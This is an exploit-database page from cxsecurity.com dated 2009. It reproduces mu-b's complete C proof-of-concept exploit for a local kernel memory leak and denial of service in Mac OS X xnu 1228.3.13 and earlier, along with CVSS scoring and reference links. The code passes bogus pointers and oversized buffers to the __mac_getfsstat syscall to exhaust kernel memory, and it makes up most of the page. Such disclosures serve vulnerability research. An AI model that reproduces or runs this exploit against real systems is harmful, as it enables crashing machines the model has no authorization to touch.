Mac OS X xnu <= 1228.3.13 (macfsstat) Local Kernel Memory Leak/DoS

2009.04.05
Credit: mu-b
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-399


CVSS Base Score: 4.9/10
Impact Subscore: 6.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

/* xnu-macfsstat-leak.c * * Copyright (c) 2008 by <mu-b@digit-labs.org> * * Apple MACOS X xnu <= 1228.3.13 local kernel memory leak/DoS POC * by mu-b - Sun 13 Apr 2008 * * - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386) * Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386) * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <sys/mount.h> #include <sys/syscall.h> #include <sys/utsname.h> #include <unistd.h> #define LEAK_BUFBYTES(a) (sizeof (struct statfs)*a) #define LEAK_MACBYTES(a) (sizeof (int)*a) struct __mac_getfsstat { char *buf; char _pad[4]; int bufsize; char __pad[4]; char *mac; char ___pad[4]; int macsize; char ____pad[4]; int flags; char _____pad[4]; }; int main (int argc, char **argv) { struct __mac_getfsstat req; int i, n; printf ("Apple MACOS X xnu <= 1228.3.13 local kernel memory leak/DoS PoC\n" "by: <mu-b@digit-labs.org>\n" "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); memset (&req, 0, sizeof req); req.buf = (char *) 0xDEADBEEF; req.bufsize = LEAK_BUFBYTES (65536 * 64); req.mac = (char *) 0xDEADBEEF; req.macsize = LEAK_MACBYTES (65536 * 64); for (i = 0; i < 2; i++) { if ((n = syscall (SYS___mac_getfsstat, req.buf, req.bufsize, req.mac, req.macsize, req.flags)) < 0) { fprintf (stderr, "leaked %lu-bytes of kernel memory!\n", LEAK_MACBYTES (65536 * 64)); } } return (EXIT_SUCCESS); }

References:

http://www.securityfocus.com/bid/34202
http://www.milw0rm.com/exploits/8264
http://www.milw0rm.com/exploits/8263
http://www.informationweek.com/news/hardware/mac/showArticle.jhtml?articleID=216401181
http://www.digit-labs.org/files/exploits/xnu-profil-leak.c
http://www.digit-labs.org/files/exploits/xnu-macfsstat-leak.c


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top